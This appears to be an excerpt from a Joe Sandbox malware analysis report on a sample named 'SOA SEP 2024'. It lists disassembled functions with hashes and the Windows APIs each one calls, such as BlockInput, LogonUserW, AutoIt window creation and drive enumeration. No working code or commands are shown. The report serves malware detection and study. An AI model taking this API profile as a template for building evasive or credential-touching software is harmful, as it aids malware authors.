Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: f9f62222e064f787bbe951b727f144d4716495ddd26f0f86188c94dbee09d9ce
Instruction ID: 51fa312b50cbddaabcfbf2bd6ad90fb3243f159bc99a24bf2d48bf4c5febdd3d
Opcode Fuzzy Hash: f9f62222e064f787bbe951b727f144d4716495ddd26f0f86188c94dbee09d9ce
Instruction Fuzzy Hash: 2BE01235210204AFDB10EB59D844A96B7ECAF78751F04C416EA45D7351DAB8E8048BA0

Function 007A74E7 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 007A750A

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: a44cad8f6a98482589fb0a2acb88eea082e3cb6754f2e75c6f72e96df9ee4c1f
Instruction ID: 4f3b5032da65db0a0d9a821838ccc8896de62a76fa804a1157880fc84253d752
Opcode Fuzzy Hash: a44cad8f6a98482589fb0a2acb88eea082e3cb6754f2e75c6f72e96df9ee4c1f
Instruction Fuzzy Hash: 17D067A656C6456DE82D07249C1BFB61508A386B82FD447497603990C0B89C5D12E039

Function 0079B106 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,0079AD3E), ref: 0079B124

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 53aba318614bdc22f61b01643f314cf66cf2cef774800588df4ed48183e7e0ee
Instruction ID: e7e0d55f21d2ef45e4316afb2d12c26efbccf8c38c60120c25b9ffad00c9424a
Opcode Fuzzy Hash: 53aba318614bdc22f61b01643f314cf66cf2cef774800588df4ed48183e7e0ee
Instruction Fuzzy Hash: 62D05E321A464EAEDF024FA4DC02EAE3F6AEB04700F448110FA21C90A0C675D931AB50

Function 007DB340 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32 ref: 007DB352

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 162fafd749e7be438d434225fdad45ca71be7d13fbb42b2c1187c8f1725f3676
Instruction ID: f21c118ec329420e7f96753c885f8b3f5d357812d4b8b58e6ae4b411292c90a3
Opcode Fuzzy Hash: 162fafd749e7be438d434225fdad45ca71be7d13fbb42b2c1187c8f1725f3676
Instruction Fuzzy Hash: DEC04CB1401159DFC751CBC0C9849EEB7BCAB08301F1450929105F1110D7749B459B76

Function 00788189 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 0078818F

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 0c745798cbcd4c7a24e1af0ea7e6ff2694e3b523f05efa7c8007dbde6b12b824
Instruction ID: bfa82c1f8496172447028f5cc99a50eab80fae0fbd38f836643817d833f6be94
Opcode Fuzzy Hash: 0c745798cbcd4c7a24e1af0ea7e6ff2694e3b523f05efa7c8007dbde6b12b824
Instruction Fuzzy Hash: 7BA0223200020CFBCF002F82FC088883F2CFB082A0B008020F80C0C030CB33AC208ACA

Function 00773200 Relevance: 1.0, Instructions: 986COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: BuffCharUpper
String ID:
API String ID: 3964851224-0
Opcode ID: 736d05fe89e8dfae30c002e59e0634e763b618ac1a874fe7fc4bb37eaf22974e
Instruction ID: e0f13b9578770d836ae252d6754ab6278d29108bd699d95e9806c6ca946e5863
Opcode Fuzzy Hash: 736d05fe89e8dfae30c002e59e0634e763b618ac1a874fe7fc4bb37eaf22974e
Instruction Fuzzy Hash: 80928970608341DFDB24DF18C484B6AB7E1BF88344F14885EE98A8B362D779ED45DB92

Function 007693F0 Relevance: .5, Instructions: 531COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4298170fd2a5d8b508746d8660b82730861a5494b725c40ded5a5396c22d1a69
Instruction ID: c54426ecbb524969ae209348f0d999bd5a93936d2da4c73a0de7c61434271302
Opcode Fuzzy Hash: 4298170fd2a5d8b508746d8660b82730861a5494b725c40ded5a5396c22d1a69
Instruction Fuzzy Hash: 1C127F70A00209DFDF14DFA5D985AEEB7F9FF58300F108569E806E7251EB39A922CB54

Function 0076E3E3 Relevance: .5, Instructions: 521COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 731614b685802f68d407c9097affd77d2949ec02af12eb70fe0bced9a7234cbd
Instruction ID: d0f3204c4fb434651c54a9125962f404abc72d86309bc6e4bf957d03f886b04f
Opcode Fuzzy Hash: 731614b685802f68d407c9097affd77d2949ec02af12eb70fe0bced9a7234cbd
Instruction Fuzzy Hash: 1F129E78A04206CFDB24DF58C484AAAB7B1FF54314F14C06AED4B9B351E739AD85CBA1

Function 0076AF50 Relevance: .5, Instructions: 514COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID:
API String ID: 3728558374-0
Opcode ID: 11ee70ecdd8d7d0fe058e21c82db159e87cf4fed6495b98bd8bac51fb75aa4c7
Instruction ID: d73b7469ea4bd6160602fa03cd9d58ad2ca16e769491bd10be3f5f8637a7d15e
Opcode Fuzzy Hash: 11ee70ecdd8d7d0fe058e21c82db159e87cf4fed6495b98bd8bac51fb75aa4c7
Instruction Fuzzy Hash: D102A2B0A00109DBCF04DF68D9856AEBBB5FF45300F10C46AEC0ADB256EB39D956CB91

Function 007802A4 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
Instruction ID: a7a880ef93e3f049b983b5815433cb26fb598e82a258cd3a422a4a9c2f5f67b7
Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
Instruction Fuzzy Hash: 86C1E2322451930ADFAD463A853443EBAA15EA2BF531A077DD8B7CB4D1FF28C528D760

Function 007806D9 Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
Instruction ID: af83742fc2aad725f600afd53a6c3ff16a32cdc96119eebb1f012bc541749857
Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
Instruction Fuzzy Hash: 25C101332451930AEFAD463AC53443EBAA15EA2BB530A437DD4B7CB0D5EF28D528D760

Function 0077FA57 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 7feaa9faf707eb5dd776b5dedd27eb6c386e42bd6f4c68f230920b184acd30dd
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 56C1B43220909309DF2D4639C67443EBBA15AA2BF531A877DD8BBCB5D5EF28C524D620

Function 00D695C0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2102902206.0000000000D66000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D66000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d66000_SOA SEP 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: e822a900fbbea03668bb43cfe18b8296ecfbfc952c8abcb0964df63217cc6062
Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: 4B41A271D1051CEBCF48CFADC991AAEFBF2AF88201F548299D516AB345D730AB41DB50

Function 00D69450 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2102902206.0000000000D66000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D66000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d66000_SOA SEP 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52b6af648c877ac6d6a76aa728722bf9b1b7a20dc0d1902be66db2f93aef2a5a
Instruction ID: 01b9256a509b39c7261f419f011588e8d9fc2245174175d824876f5289b5f369
Opcode Fuzzy Hash: 52b6af648c877ac6d6a76aa728722bf9b1b7a20dc0d1902be66db2f93aef2a5a
Instruction Fuzzy Hash: 97019278A00109EFCB44DF98C5909AEF7F9FF58310F208599E819A7741D730AE42DB94

Function 00D694B0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2102902206.0000000000D66000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D66000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d66000_SOA SEP 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab1ed642c9e2cf619b0ca28225d8e547d23f1e0e217189ac3431c3358c2c8a8c
Instruction ID: a72b4504c755cfea66dbc26d84f7e72d53c23e281d36fd1119f9f137d3124bf8
Opcode Fuzzy Hash: ab1ed642c9e2cf619b0ca28225d8e547d23f1e0e217189ac3431c3358c2c8a8c
Instruction Fuzzy Hash: CC019278A00109EFCB44DF98C5909AEF7B9FF48310F208599E919A7745D730AE41DB90

Function 00D67E30 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2102902206.0000000000D66000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D66000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d66000_SOA SEP 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48

Function 007BA2A9 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 007BA2FE
DeleteObject.GDI32(00000000), ref: 007BA310
DestroyWindow.USER32 ref: 007BA31E
GetDesktopWindow.USER32 ref: 007BA338
GetWindowRect.USER32(00000000), ref: 007BA33F
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 007BA480
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 007BA490
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007BA4D8
GetClientRect.USER32(00000000,?), ref: 007BA4E4
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 007BA51E
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007BA540
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007BA553
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007BA55E
GlobalLock.KERNEL32(00000000), ref: 007BA567
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007BA576
GlobalUnlock.KERNEL32(00000000), ref: 007BA57F
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007BA586
GlobalFree.KERNEL32(00000000), ref: 007BA591
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007BA5A3
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,007ED9BC,00000000), ref: 007BA5B9
GlobalFree.KERNEL32(00000000), ref: 007BA5C9
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 007BA5EF
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 007BA60E
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007BA630
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007BA81D

Strings

AutoIt v3, xrefs: 007BA4D0
static, xrefs: 007BA518, 007BA66F
, xrefs: 007BA7A3
DISPLAY, xrefs: 007BA680

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 5492bc64f9e0766612d3a884e86156de7c633e142af42962ebfc1e4ee2dd35e3
Instruction ID: 0eb6577c319553743948dcc7fcb9a5d50bfe8da7e56880c1bacafcbc9a986627
Opcode Fuzzy Hash: 5492bc64f9e0766612d3a884e86156de7c633e142af42962ebfc1e4ee2dd35e3
Instruction Fuzzy Hash: 97026071900258EFDB24DFA8CD89EAE7BB9FF48310F108158F915AB2A1D7789D41CB64

Function 007CD285 Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 007CD2DB
GetSysColorBrush.USER32(0000000F), ref: 007CD30C
GetSysColor.USER32(0000000F), ref: 007CD318
SetBkColor.GDI32(?,000000FF), ref: 007CD332
SelectObject.GDI32(?,00000000), ref: 007CD341
InflateRect.USER32(?,000000FF,000000FF), ref: 007CD36C
GetSysColor.USER32(00000010), ref: 007CD374
CreateSolidBrush.GDI32(00000000), ref: 007CD37B
FrameRect.USER32(?,?,00000000), ref: 007CD38A
DeleteObject.GDI32(00000000), ref: 007CD391
InflateRect.USER32(?,000000FE,000000FE), ref: 007CD3DC
FillRect.USER32(?,?,00000000), ref: 007CD40E
GetWindowLongW.USER32(?,000000F0), ref: 007CD439

Part of subcall function 007CD575: GetSysColor.USER32(00000012), ref: 007CD5AE
Part of subcall function 007CD575: SetTextColor.GDI32(?,?), ref: 007CD5B2
Part of subcall function 007CD575: GetSysColorBrush.USER32(0000000F), ref: 007CD5C8
Part of subcall function 007CD575: GetSysColor.USER32(0000000F), ref: 007CD5D3
Part of subcall function 007CD575: GetSysColor.USER32(00000011), ref: 007CD5F0
Part of subcall function 007CD575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 007CD5FE
Part of subcall function 007CD575: SelectObject.GDI32(?,00000000), ref: 007CD60F
Part of subcall function 007CD575: SetBkColor.GDI32(?,00000000), ref: 007CD618
Part of subcall function 007CD575: SelectObject.GDI32(?,?), ref: 007CD625
Part of subcall function 007CD575: InflateRect.USER32(?,000000FF,000000FF), ref: 007CD644
Part of subcall function 007CD575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007CD65B
Part of subcall function 007CD575: GetWindowLongW.USER32(00000000,000000F0), ref: 007CD670
Part of subcall function 007CD575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 007CD698

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: 9de9cfb2a2e1da1ae29f54eef5109111597faba259987c7aea40ae714356cf20
Instruction ID: 509880d22606e9d66dd001cf9d84031b8d1823c32aef3b3be675638114029e28
Opcode Fuzzy Hash: 9de9cfb2a2e1da1ae29f54eef5109111597faba259987c7aea40ae714356cf20
Instruction Fuzzy Hash: 6891AF71009345FFCB209F64DC88E6B7BA9FB88325F104A2DF9629A1A0D779DD40CB56

Function 0077B8FD Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 491windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 0077B98B
DeleteObject.GDI32(00000000), ref: 0077B9CD
DeleteObject.GDI32(00000000), ref: 0077B9D8
DestroyIcon.USER32(00000000), ref: 0077B9E3
DestroyWindow.USER32(00000000), ref: 0077B9EE
SendMessageW.USER32(?,00001308,?,00000000), ref: 007DD2AA
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 007DD2E3
MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 007DD711

Part of subcall function 0077B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0077B759,?,00000000,?,?,?,?,0077B72B,00000000,?), ref: 0077BA58

SendMessageW.USER32 ref: 007DD758
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 007DD76F
ImageList_Destroy.COMCTL32(00000000), ref: 007DD785
ImageList_Destroy.COMCTL32(00000000), ref: 007DD790

Strings

0, xrefs: 007DD5A5

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: 85a915348a513a92b76fd4f9e10cb3bcabb3fc53d40d32484b7833171421034b
Instruction ID: 6a40905a2b6fd1beb68ef1ea55a617c2cf0d8bf2269f34b29dcfa70b38749415
Opcode Fuzzy Hash: 85a915348a513a92b76fd4f9e10cb3bcabb3fc53d40d32484b7833171421034b
Instruction Fuzzy Hash: 52127C70204241DFDB21CF24C888BA9BBB5FF49354F18856AEA99CB252C739FC55CB91

Function 007ADBC4 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 007ADBD6
GetDriveTypeW.KERNEL32(?,007FDC54,?,\\.\,007FDC00), ref: 007ADCC3
SetErrorMode.KERNEL32(00000000,007FDC54,?,\\.\,007FDC00), ref: 007ADE29

Strings

USB, xrefs: 007ADDBD
Network, xrefs: 007ADD01
Removable, xrefs: 007ADD15
CDROM, xrefs: 007ADCF7
SAS, xrefs: 007ADDD2
SSA, xrefs: 007ADDAF
\\.\, xrefs: 007ADC2B
PhysicalDrive, xrefs: 007ADC67
SCSI, xrefs: 007ADD93
ATA, xrefs: 007ADDA1
Fibre, xrefs: 007ADDB6
RAID, xrefs: 007ADDC4
Fixed, xrefs: 007ADD0B
iSCSI, xrefs: 007ADDCB
Virtual, xrefs: 007ADDEE
FileBackedVirtual, xrefs: 007ADDF5
ATAPI, xrefs: 007ADD9A
SSD, xrefs: 007ADD50
Unknown, xrefs: 007ADCE3, 007ADD8C
1394, xrefs: 007ADDA8
RAMDisk, xrefs: 007ADCED
SATA, xrefs: 007ADDD9
MMC, xrefs: 007ADDE7

Memory Dump Source

